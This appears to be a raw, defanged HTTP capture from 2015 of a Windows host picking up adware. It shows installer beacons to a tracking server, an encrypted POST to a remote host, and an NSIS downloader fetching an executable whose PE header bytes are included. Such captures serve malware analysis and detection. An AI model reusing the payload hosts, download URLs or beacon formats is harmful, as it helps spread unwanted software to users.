0A0Czu0Y0B0RtN0U0I0DzutDtDyDtDyDyCtBtCtDtCyByEtCtCyD0FtN0W0VzuyCtFtCtN0W0S0PzutCtN0O0S0L1T1G1Nzu1P1GtN0E2V1P0C1M1J0S2Y1HzutAyDyEtCtDzytCyCyCtBtN1L1B0A1Q1H1L1GzutCtN0T0KzutAzzyEtAtAzytN0U0I0DzutDtDyDtDyDyCtBtCtDtCyByEtCtCyD0FtN0U0I0D0N1P2WzutDtDyDtDyDyCtBtCtDtCyByEtCtCyD0FtN0M0G0U0I0Dzu1RtDtAtBtB1T1R1QtGyD1PyD1QtGyEtB1OtDtG1StCyCtAtG1RyDzytC1P1PyC1O1OyD1SzytN0M0S0I0DzutBzzyDzztDtBtDzytAyDtGtBtCyDyCzyzytByDyDtDtGtAyCyDzztCtAtCzztDyEtN0S0I0D0U0I0Dzu0A0AyDzy0FtDyEyBzztDzytCtCzztByC0D0AtD0A0AzyyD0C0ByEzz0AtCtCyD0FtN0M0A0C1V0LzutDtDyDtDyDyCtBtCtDtCyByEtOtA0AtCzytBtFtCyCzztFtCtAzytFtCtAyDtOtA0AyCtOtA0AtCtN0S0D0TzutBtDtCyDtDyDtDtCtDtBtDyBtDzytDtBzztN0V0M0Czu0V0M0WtN1L1B0V0M0D1P1OzutCtN0P0E1V0M0O0D0Ezu0D0L0LtN1I1L2ZzutAyDyCyBzzzytN1L1Q1B1RzutByBtN0D0E0P1V0M0O0DzutBtN1L1B0A1Q1H1L1GzutCtN1L1B0U1T1R0O1GzutDtN1L1B0U1B1P1C0A1Q1H1L1GzutCtN0R0N1T1H1Pzu0CtOtA0AtOyD0C0U1B1P1C1BtOyD0C1T1Q1HtOyD0C0A1E1E0D1T2Z1TtOyD0C0L1F1R1T1ItOyD0C0T1P1H1EtOyD0C0T1P1H1EtOyD0C0O1NtA0C2X0TyBzz2X0S0M1TtD0NtD0L0P1T1LyB0Q2X2Z1NtA0C2X0TyBzz2X0S0M1TtD0NtD0L0P1T1LyB0Q2X2ZtOyD0CtAtCtDyBtCyE1V1L1BtF1P2V1PtN0O0S0L1T1G1Nzu1P1GtN0O0S0V1P1CzuyCtFtCtN0O0S0S0P0V1P1CzutCtN0O0S2VyCyEzutCtN0P0P0Nzu1TtCtDyC1RtAzz1PzyyCtCtBtByB1O1PyEtDtC1O1P1QtA1PtAyDyBtBzzyD1S1RtF1P2V1PtN0M1P1H0P1M0AzutCtAtByBtN0M1P1H0P1M0TzutBtDyEyBtN0M1P1H0V1L1C0AzutCzyyCyEtN0M1P1H0V1L1C0TzutBtDyEyBtN0P0R0O0D0U0C0T1V0T0I0T0L0Ezu1Q1P1B1E1C1F2Z1P2Z1F1C

HTTP/1.1 200 OK

Cache-Control: no-cache

Content-Type: text/plain

Date: Thu, 30 Apr 2015 23:07:07 GMT

Expires: Thu, 01 Jan 1970 00:00:01 GMT

Server: nginx

X-ICSCT-CC: UA

X-ICSCT-CITY: Kharkiv

X-ICSCT-GICSET: global1373

X-ICSCT-IP: 193.138.244.231

X-ICSCT-SERVER-NAME: ads.slave-128-eu-west-1b-c298b624

X-ICSCT-TIMESTAMP: 20150430180707062

X-ICSCT-VERSION: 1.2.8

X-ICSCT-XC: 1f3cfb072bc5ded412eb0f20eaa0b3fa349c056a

X-Robots-Tag: none

transfer-encoding: chunked

Connection: keep-alive

1f00..w!..h...h.jq1.....~.....Q..NH...!.......$&..L......D.....c3.=4.a.wlZ..=. .j:Hc.u.c....xJ<?j../x:..:;."..1......"U].7..IR......Lc..=..7c!..p4H..-..p..EI.Ff.6qpZ..Zj..G.....C?.Q>.g.7.U.7...5.....>I..f.oq.v.G......e6...9.?...)n6.T...%..Yu..w....!.5.%.-.35%.[.<0.9.q...ao..J.......I.a.?ca..`!...T.....fR0.7i..3.\..}.6.)....O@.T%.....w....\kCX.S.Wf...5..t.........<....%gf.U.....9..5zf.tn._1|.a..4U_GA..;.t{..c.x).LX)..}q".....EMr...q..cl.....L....1"..m..!cnr..h3....l.GG==K.R.iR.[*...&...vt.. ....~.....Q....9..Kn.(....s..y..(.BZ.x..~m..'p..`0..)....86..x.?.~...{{..9:..82.zN..E.3.......&..|=...a...9..x..RI...{08p.r._)...i%.q.._.p<.5x..Z[..gv....7R.@S..J..g...tV,.......;..uO.[...5.?..{*......._.W92...J.L.s.992.TmC......Y0.u.?...?..)Z....Stl....2..A. a|?wU.3..y....5..z..[I....)X#~p:.......g4.d6%...zd..g.8...q..&.....W..p....b ...Y...O............c,.s.N.\.9.u........=...$l..@h.T...@.r.[.3...n...h.;. ?.y9..|....4..y..r.........).g.......d.8r.E.O3@.{..8.. ...F..=..0e...{.f."....K:..5. ,.r.......o.}.F.N*....A..Su...l...i..a.{. ..#..J4...iT...r..............4hX...=.a=.....T.h.f.st;.G,.z..^v..k..h..O..x...n....8O...../o....b...G.QC...S!H]iL.. ..9n..|2.z.8....$..1../...2..R..N......O.45.w...t.?].q5..>7;.".....*Y.B.w...X..,...f..6%..[..>z`?x...*.)Esn....H....G...xzI#.J.A"...Ow...vr.."b....3../zd.h.........-......CO.U.`...IkM.uh...XC.%A.Tc:xY|t...Q....a.k.z..D....3h.....-.7.._U.N.bk9..>.3..l.f....A2.5."......`.!...t!..t......|.F...k......$J....}x...%I.U..V1...e...f.n..p.NOU.uB....X.Q.a-....H@.......

<<< skipped >>>

GET /windowspm/up?ptid=pcm&sid=WindowsMangerProtect&ln=en_us&ver=20.0.0.2227&uid=&upv= HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)

Host: VVV.theviilage.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx

Date: Thu, 30 Apr 2015 23:08:35 GMT

Content-Type: text/html; charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

Vary: Accept-Encoding

X-Powered-By: PHP/5.2.14p1

Content-Encoding: gzip

15............3............0..HTTP/1.1 200 OK..Server: nginx..Date: Thu, 30 Apr 2015 23:08:35 GMT..Content-Type: text/html; charset=UTF-8..Transfer-Encoding: chunked..Connection: keep-alive..Vary: Accept-Encoding..X-Powered-By: PHP/5.2.14p1..Content-Encoding: gzip..15............3............0..

POST /?pcrc=497235937&v=2.0 HTTP/1.1

Accept: */*

Host: rp.beyabir.com

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Content-Length: 688

Cache-Control: no-cache

....V.....2$.....R...\... Q.\......1Xu..o .F....TT........y. ..)..z.k..OIx.....9o1....J..!....A/....n2%.......|{")....Uq.w....hPT.d..U%...)DE.(.2..:SBy.W........A..k.S`.!.W..N.#.m.`g.\ST..u....... .8l....?...K._J....QnUU..J,.#........?......m.FY...z.-.a....@..(.9._2tZ...0p.......b...`........rQ*?.V.,...

|[@U5O..............(...? .Mf...M..7M.,,...$..4.U..D]y..Y..d b,....:N@.]..-.YR......f.{.[5.1.).............S.:..}=.Um.I.cYa.......`...-.,Ha/...X.tB............ .~.....Z<u.uG...s.../............6...H.L...`.r....%.S.....W~.c...FR[......IPx6:d..).C...C.O1...{.~B.6w..}b@JU....-..'.m../...?0....,.....!n......s.d.C2..U@Q...dL.2@.p...e..]p... ..X^.........K..6?...is_..|..WH.Tc...

HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8

Date: Thu, 30 Apr 2015 23:07:08 GMT

Server: TornadoServer/4.0.2

Content-Length: 4

Connection: keep-alive

DONEHTTP/1.1 200 OK..Content-Type: text/html; charset=UTF-8..Date: Thu, 30 Apr 2015 23:07:08 GMT..Server: TornadoServer/4.0.2..Content-Length: 4..Connection: keep-alive..DONE..

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTEemCaVgs8Tuh2B9fGVE0pKKNyzgQUTF+nNhcF4oZhIkk5jLmo40rgOBoCEC6utoKGY/7ZdVX4/iTzOxo= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.verisign.com

HTTP/1.1 200 OK

Server: nginx/1.4.7

Content-Type: application/ocsp-response

Content-Length: 1552

content-transfer-encoding: binary

Cache-Control: max-age=521950, public, no-transform, must-revalidate

Last-Modified: Thu, 30 Apr 2015 00:10:33 GMT

Expires: Thu, 7 May 2015 00:10:33 GMT

Date: Thu, 30 Apr 2015 23:12:34 GMT

Connection: keep-alive

0..........0..... .....0......0...0........C...4N...@..6...v...20150430001033Z0s0q0I0... .........z`.V.<N.v...TM)(.r...L_.6....a"I9....J.8........c..uU..$.;.....20150430001033Z....20150507001033Z0...*.H.............e...E;....(..c.Fd...h@.e.....,.jPVAh..z...4..eL. ....2.G9.i}..H..!.}..........<.w..0W......a...S.K)AR.h..N...V}.5:,..xE......n..jn.:wg.h{....D.:-...~.7....L?..W...<.Vm..5.6o.g...3..=...f.R.W(.t.`.. &.4:..d....K..K..A./.e.d..W..K=a..l......f...........0.......50..10..-0..........y.P}~.EY....T]. 0...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1<0:..U...3Class 3 Public Primary Certification Authority - G21:08..U...1(c) 1998 VeriSign, Inc. - For authorized use only1.0...U....VeriSign Trust Network0...141202000000Z..151216235959Z0..1.0...U....US1.0...U....Symantec Corporation1.0...U....Symantec Trust Network1?0=..U...6Symantec Class 3 PCA - G2 OCSP Responder Certificate 30.."0...*.H.............0..........6..]......w';.r........I..c..4.... .........TyW......hd_.....!C.k......SE<?o.H.. .me.c..9N.&....e.^-..a.....i\:..*."..u...|....".Nf3.~.L...QW...p.....-]UV8U...J&.<./.G.....I...4.T....#I*.i.E0\..~q$.I.......X?G....f.t......v.l.U.Ld.I...B.....=...Sf...H.s.........0..0...U....0.0l..U. .e0c0a..`.H...E....0R0&.. .........hXXp://VVV.symauth.com/cps0(.. .......0...hXXp://VVV.symauth.com/rpa0...U.%..0... .......0...U........0... .....0......0!..U....0...0.1.0...U....TGV-B-2740...*.H............1.`...i.....H.C.i.9~.i..Z.r.*$..(./.ag9.....J.Q.~.`.$?b..C....<.h.........d&....3.kV.....f.

<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRODEXefhs/UZFum2o8YfzOFwceMwQUkz5j3yJ0BOBkhDHd2yOfDq+2TZMCEA89qsgV9niZmSI6gIO0S/U= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.verisign.com

HTTP/1.1 200 OK

Server: nginx/1.4.7

Content-Type: application/ocsp-response

Content-Length: 1725

content-transfer-encoding: binary

Cache-Control: max-age=565181, public, no-transform, must-revalidate

Last-Modified: Thu, 30 Apr 2015 12:10:12 GMT

Expires: Thu, 7 May 2015 12:10:12 GMT

Date: Thu, 30 Apr 2015 23:12:34 GMT

Connection: keep-alive

0..........0..... .....0......0...0......%bn.$..5.......?'4....20150430121012Z0s0q0I0... ........N.E.~.?Q.n.j<a.....3...>c."t..d.1..#....M....=....x..":...K.....20150430121012Z....20150507121012Z0...*.H..............B.l..8........Gs/........"..........G...{?.^....R..'...)..........J...0.R.l..)........W.N........D...D.K.....C....y.<....Y.S....#93..B.}....6....%..3Sf... ...j..S=.,@....N.......[..%.yI_...1......)....N{.JOL....7..Ts..E.....qM@R.F.....J...M.R.C{.D~.j~...{....0...0...0..........7.R.~|..r."....#0...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1;09..U...2Terms of use at hXXps://VVV.verisign.com/rpa (c)091.0,..U...%VeriSign Class 3 Code Signing 2009 CA0...150401000000Z..150630235959Z0..1.0...U....US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1:08..U...1VeriSign Class 3 Code Signing 2009 OCSP Responder0.."0...*.H.............0..........z..|..>.....5.Z ...2.C MWIH.5......M.\.... ...eW..`.B=..`:..R. ...Z.k.Y.....p@.(3.c....a.;..[E....J:'...`...B....M..&......{. (........%......^[v[....m....*.T.o&4..3.....3.........G...e)...'?.K..2s..8=?..z.:..T..-.8R..8wv7*U.K..c...<s...]{.........6.?_...........0...0...U....0.0....U. ...0..0....`.H...E....0..0(.. .........hXXps://www.verisign.com/CPS0b.. .......0V0...VeriSign, Inc.0.....=VeriSign's CPS incorp. by reference liab. ltd. (c)97 VeriSign0...U.%..0... .......0...U........0... .....0......0"..U....0...0.1.0...U....TGV-B-34920...*.H.............,..-......q3a........z....t;B.z.h...]...#}.6.,..YU..

<<< skipped >>>

GET /SL2 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.4threquest.me/150814s/150814c.htm

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)

Host: pcmega.go2cloud.org

Connection: Keep-Alive

HTTP/1.1 200 OK

Cache-Control: no-cache, no-store, must-revalidate

Content-Type: image/gif

Date: Thu, 30 Apr 2015 23:07:09 GMT

Expires: Sat, 26 Jul 1997 05:00:00 GMT

Pragma: no-cache

Server: nginx/1.7.9

Content-Length: 43

Connection: keep-alive

GIF89a.............!.......,...........D..;..

GET //MEowSDBGMEQwQjAJBgUrDgMCGgUABBS2CA1fbGt26xPkOKX4ZguoUjM0TgQUQMK9J47MNIMwojPX+2yz8LQsgM4CCQDstfTWy5byVg== HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.godaddy.com

HTTP/1.1 200 OK

Date: Thu, 30 Apr 2015 23:11:54 GMT

Server: Apache

Content-Transfer-Encoding: Binary

Cache-Control: max-age=120452, public, no-transform, must-revalidate

Last-Modified: Thu, 30 Apr 2015 22:25:06 GMT

Expires: Sat, 02 May 2015 10:25:06 GMT

ETag: "e6664fd0595206b2ff0e579607b274885636c2c5"

Content-Length: 1788

Connection: close

Content-Type: application/ocsp-response

0..........0..... .....0......0...0...z0x1.0...U....US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy Inc.1 0)..U..."Go Daddy Validation Authority - G2..20150430222506Z0l0j0B0... ..........._lkv...8..f..R34N..@..'..4.0.3..l...,............V....20150430222506Z....20150502102506Z0...*.H..............7y......\..b.H].W.]..}.$...R..&.1.0....<.Q.m......=......I..^..1...L.7..p.....E......#.UI....,P.4&.n....u!..ep..xZb.V.v.R\.FpN .%.......C.9......U.)X.#..=o.^.G.k..U..{.^.$1tE..\...[.5..75....]....b..w..j....N.0.V...-vh......e..........L..N_.[KS....%B.9".D....0...0...0..........,.z.Hl..0...*.H........0..1.0...U....US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy.com, Inc.1-0 ..U...$hXXp://certs.godaddy.com/repository/1301..U...*Go Daddy Secure Certificate Authority - G20...150316070000Z..160316070000Z0x1.0...U....US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy Inc.1 0)..U..."Go Daddy Validation Authority - G20.."0...*.H.............0.........xo(....QQ.`L.~...&...a.F.=.....d=....."......?...\..........b.D....l=.HS.N......A..;HTTP/1.1 200 OK..Date: Thu, 30 Apr 2015 23:11:54 GMT..Server: Apache..Content-Transfer-Encoding: Binary..Cache-Control: max-age=120452, public, no-transform, must-revalidate..Last-Modified: Thu, 30 Apr 2015 22:25:06 GMT..Expires: Sat, 02 May 2015 10:25:06 GMT..ETag: "e6664fd0595206b2ff0e579607b274885636c2c5"..Content-Length: 1788..Connection: close..Content-Type: application/ocsp-response..0..........0..... .....0......0...0...z0x1.0...U....US1.0...U....Arizona1.0

<<< skipped >>>

GET /s9.g?login=pcofferp&jv=y&j=y&srw=1716&srb=32&l=http://VVV.4threquest.me/registro/310113f8.htm HTTP/1.1

Accept: */*

Referer: hXXp://VVV.4threquest.me/010914s/010914i.htm

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)

Host: e0.extreme-dm.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.7.10

Date: Thu, 30 Apr 2015 23:07:06 GMT

Content-Type: image/gif

Content-Length: 43

Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT

Connection: close

Cache-Control: private,no-cache,no-store

Pragma: no-cache

Expires: Mon, 28 Sep 1970 06:00:00 GMT

GIF89a.............!.......,...........L..;..

GET /services/rules.txt?dummy=908 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)

Host: VVV.gosaferllc.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.0.15

Date: Thu, 30 Apr 2015 23:07:22 GMT

Content-Type: text/plain

Connection: keep-alive

Last-Modified: Sun, 28 Dec 2014 17:27:37 GMT

ETag: "5a246f5-10-50b4a12f3b440"

Accept-Ranges: bytes

Content-Length: 16

Cache-Control: max-age=600

Expires: Thu, 30 Apr 2015 23:17:22 GMT

P3P: CP="Potato"

X-Cache: BYPASS

</body>|</body>.....

GET /services/update.php?v=1.0.0&key=OuKz1Yi6BxlXdCQ8IZpYGGBgz2TyMvRv&dummy=408 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)

Host: VVV.gosaferllc.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.0.15

Date: Thu, 30 Apr 2015 23:07:23 GMT

Content-Type: text/html

Connection: keep-alive

X-Powered-By: PHP/5.5.15

P3P: CP="Potato"

Content-Length: 0

X-Cache: BYPASS

HTTP/1.1 200 OK..Server: nginx/1.0.15..Date: Thu, 30 Apr 2015 23:07:23 GMT..Content-Type: text/html..Connection: keep-alive..X-Powered-By: PHP/5.5.15..P3P: CP="Potato"..Content-Length: 0..X-Cache: BYPASS..

GET /v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.hp HTTP/1.1

Connection: Keep-Alive

User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926

Host: xa.xingcloud.com

HTTP/1.1 200 OK

Server: nginx/0.7.67

Date: Thu, 30 Apr 2015 23:07:18 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.3.3

xa-api-version: v4

48..{"stats":"ok","time":"0.85 ms","message":"store 1 action and 0 update "}..0..HTTP/1.1 200 OK..Server: nginx/0.7.67..Date: Thu, 30 Apr 2015 23:07:18 GMT..Content-Type: text/html; charset=utf-8..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.3.3..xa-api-version: v4..48..{"stats":"ok","time":"0.85 ms","message":"store 1 action and 0 update "}..0......

GET /v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.nt.ff.tab HTTP/1.1

Connection: Keep-Alive

User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926

Host: xa.xingcloud.com

HTTP/1.1 200 OK

Server: nginx/0.7.67

Date: Thu, 30 Apr 2015 23:07:25 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.3.3

xa-api-version: v4

4a..{"stats":"ok","time":"289.61 ms","message":"store 1 action and 0 update "}..0..

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRIt2RJ89X++hEzqoBeQg8PymQ2UQQUANhaTCXBIuWLMe9tuvPMXynxDWECEGVSJuGyLhjhWQ8phawi51w= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.verisign.com

HTTP/1.1 200 OK

Server: nginx/1.4.7

Content-Type: application/ocsp-response

Content-Length: 1453

content-transfer-encoding: binary

Cache-Control: max-age=552950, public, no-transform, must-revalidate

Last-Modified: Thu, 30 Apr 2015 08:45:10 GMT

Expires: Thu, 7 May 2015 08:45:10 GMT

Date: Thu, 30 Apr 2015 23:12:10 GMT

Connection: keep-alive

0..........0..... .....0......0...0......T3t.%..O.E..~..F.=....20150430084510Z0s0q0I0... ........H.dI.....3..^B...d6Q....ZL%."..1.m..._)..a..eR&.....Y.)..".\....20150430084510Z....20150507084510Z0...*.H.............S.F1....m^.f...(.Ss@*M`:_.GI.Y.I"..}M@........*....o9-.{2W..)'./.A....VIl....Xy......#.J..!..z.Q...0.Z.W.e....{D...tm..=.(........W.3G.t..mw....#tn%n.P...,...E.mD.N..P.b.qY..|.c.>..xBZ.J.l.G..wx.......y.89...@.i.~.?.o.x.k.KB......6.....g.owYk........B(...D....0...0...0..3......./...b.v..-....l}0...*.H........0_1.0...U....US1.0...U....VeriSign, Inc.1705..U....Class 3 Public Primary Certification Authority0...141202000000Z..151216235959Z0..1.0...U....US1.0...U....Symantec Corporation1.0...U....Symantec Trust Network1?0=..U...6Symantec Class 3 PCA - G1 OCSP Responder Certificate 30.."0...*.H.............0..........'......Y..x.3B1.7..Q..`..d.. ....s..t.$a.....j2R.{ ,*..c{.3.....H..3-; ).....0._...*..9M..V...... ...{m...-.......)..tR..{D....~...M...T..pS.p..^|o....S..v.).).....r.v.qo$......C.V!....@.h#qh...u1T.].G0.]E...=._...... ........TE...Sa.s4........r...3.............0..0...U....0.0l..U. .e0c0a..`.H...E....0R0&.. .........hXXp://VVV.symauth.com/cps0(.. .......0...hXXp://VVV.symauth.com/rpa0...U.%..0... .......0...U........0... .....0......0!..U....0...0.1.0...U....TGV-B-2730...*.H.............$..H......oU....Y!.z{*.V.M..u.._z..3>.. 0....3..m.....e.......a..D...........e..F6:.y.....di.......<y.Z.......x}..q.2....UZ1 :,....

<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSpuCE3aK3GivZPzGQJ6L5BRyZofwQUl9BrqCZwyKE/lB8ILcQ1m6ShHvICEAxNF3PJUX7iAOhAP2oGxcI= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.verisign.com

HTTP/1.1 200 OK

Server: nginx/1.4.7

Content-Type: application/ocsp-response

Content-Length: 1790

content-transfer-encoding: binary

Cache-Control: max-age=361763, public, no-transform, must-revalidate

Last-Modified: Tue, 28 Apr 2015 03:40:02 GMT

Expires: Tue, 5 May 2015 03:40:02 GMT

Date: Thu, 30 Apr 2015 23:12:11 GMT

Connection: keep-alive

0..........0..... .....0......0...0......'.V.8.F.V....H....JW..20150428034002Z0s0q0I0... ..........!7h....O.d...AG&h.....k.&p..?...-.5........M.s.Q~...@?j.......20150428034002Z....20150505034002Z0...*.H..............>...|.#%....9.x.Fl.{.j..i.{<...B......5h..T.....<....).nU,7.L.,UpM&F9~.....ye.wpA.W.(9...VO{R.".~.C..G.t.*B...L......D.tj.............@.F......O$...zL........{..G...............].A..z..:{.*&*..2QS..s..Nt3..G..CR..D...-.T....H...l.7\..z..:.E.}L.Yk.Zvc..[.....#0...0...0..........r..?.*......y"..0...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1;09..U...2Terms of use at hXXps://VVV.verisign.com/rpa (c)09100...U...'VeriSign Class 3 Code Signing 2009-2 CA0...150226000000Z..150527235959Z0..1.0...U....US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1;09..U...2Terms of use at hXXps://VVV.verisign.com/rpa (c)091<0:..U...3VeriSign Class 3 Code Signing 2009-2 OCSP Responder0.."0...*.H.............0.............m5*R........2....>...yU4..L.. ...........u..Hez..Pn.....d...nz(...V7.}^...d!RX...bl..[..a...L.. .~..Ij......%..%p.-...u..:..i..F*]...*....{NH..|0...gHX.Q.r....S..........._.9.(w...suC...N..s.....&."...:.C.Q.i~rl..<..krS..8.B..o].y..L.4...iB@..s.....mw.........0...0...U....0.0....U. ...0..0....`.H...E....0..0(.. .........hXXps://VVV.verisign.com/CPS0b.. .......0V0...VeriSign, Inc.0.....=VeriSign's CPS incorp. by reference liab. ltd. (c)97 VeriSign0...U.%..0... .......0...U........0... .....0......0"..U....0...0.1.0...U....TGV-B-32010...

<<< skipped >>>

GET /v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.ChromeSync HTTP/1.1

Connection: Keep-Alive

User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926

Host: xa.xingcloud.com

HTTP/1.1 200 OK

Server: nginx/0.7.67

Date: Thu, 30 Apr 2015 23:07:39 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.3.3

xa-api-version: v4

48..{"stats":"ok","time":"1.20 ms","message":"store 1 action and 0 update "}..0..

GET /v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.regok HTTP/1.1

Connection: Keep-Alive

User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926

Host: xa.xingcloud.com

HTTP/1.1 200 OK

Server: nginx/0.7.67

Date: Thu, 30 Apr 2015 23:07:21 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.3.3

xa-api-version: v4

48..{"stats":"ok","time":"0.63 ms","message":"store 1 action and 0 update "}..0..HTTP/1.1 200 OK..Server: nginx/0.7.67..Date: Thu, 30 Apr 2015 23:07:21 GMT..Content-Type: text/html; charset=utf-8..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.3.3..xa-api-version: v4..48..{"stats":"ok","time":"0.63 ms","message":"store 1 action and 0 update "}..0..

GET //MEQwQjBAMD4wPDAJBgUrDgMCGgUABBTkIInKBAzXkF0Qh0pel3lfHJ9GPAQU0sSw0pHUTBFxs2HLPaH+3ahq1OMCAxvnFQ== HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.godaddy.com

HTTP/1.1 200 OK

Date: Thu, 30 Apr 2015 23:11:52 GMT

Server: Apache

Content-Transfer-Encoding: Binary

Cache-Control: max-age=120329, public, no-transform, must-revalidate

Last-Modified: Thu, 30 Apr 2015 22:22:55 GMT

Expires: Sat, 02 May 2015 10:22:55 GMT

ETag: "c6961d1bde2c92575adba40476a0f961c1ef5e15"

Content-Length: 1708

Connection: close

Content-Type: application/ocsp-response

0..........0..... .....0......0...0......0..1.0...U....US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy.com, Inc.100...U...'Go Daddy Root Validation Authority - G1..20150430222255Z0f0d0<0... ......... ......]..J^.y_..F<........L.q.a.=....j...........20150430222255Z....20150502102255Z0...*.H..............z...ue.`iK..sr.Q.2.....)q7....c........(.".....eZ..<..9$....]..Ws. 6.N@.......M.Us.;...h..58.z.........g.......y.......#. ....U.v........;.".U`....O...l3.$$..-L\.i9.#{tlf{.[J.R..RO.u....Te.\L.....?U..vM.q..%..5..b...[..h-.F.c...v.iz.....BS.h`.td.....W..Z....m0..i0..e0..M...........T.m^'0...*.H........0c1.0...U....US1!0...U....The Go Daddy Group, Inc.110/..U...(Go Daddy Class 2 Certification Authority0...150316070000Z..160316070000Z0..1.0...U....US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy.com, Inc.100...U...'Go Daddy Root Validation Authority - G10.."0...*.H.............0.........xo(....QQ.`L.~...&...a.F.=.....d=....."......?...\..........b.D....l=.HS.N......A..;....C)...(..T........XA-N....k1 .....ag...,4.L{.I..hEKb..K.....HTTP/1.1 200 OK..Date: Thu, 30 Apr 2015 23:11:52 GMT..Server: Apache..Content-Transfer-Encoding: Binary..Cache-Control: max-age=120329, public, no-transform, must-revalidate..Last-Modified: Thu, 30 Apr 2015 22:22:55 GMT..Expires: Sat, 02 May 2015 10:22:55 GMT..ETag: "c6961d1bde2c92575adba40476a0f961c1ef5e15"..Content-Length: 1708..Connection: close..Content-Type: application/ocsp-response..0..........0..... .....0......0...0......0..1.0...U....US1.0...U....A

<<< skipped >>>

GET /310714d/310714_cr.exe?g3CvT78vSMa0N0LPai7Qvt=g3CvT78vSMa0N0LPai7Qvt HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: VVV.4threquest.me

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx/1.0.15

Date: Thu, 30 Apr 2015 23:07:42 GMT

Content-Type: application/octet-stream

Content-Length: 1085040

Last-Modified: Thu, 30 Apr 2015 23:07:02 GMT

Connection: keep-alive

Access-Control-Allow-Origin: *

Access-Control-Allow-Headers: X-Requested-With

CC: UA

Accept-Ranges: bytes

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\..........<2.......p....@..........................................................................s.......................................................................................p...............................text...ZZ.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata.......@...........................rsrc................v..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t 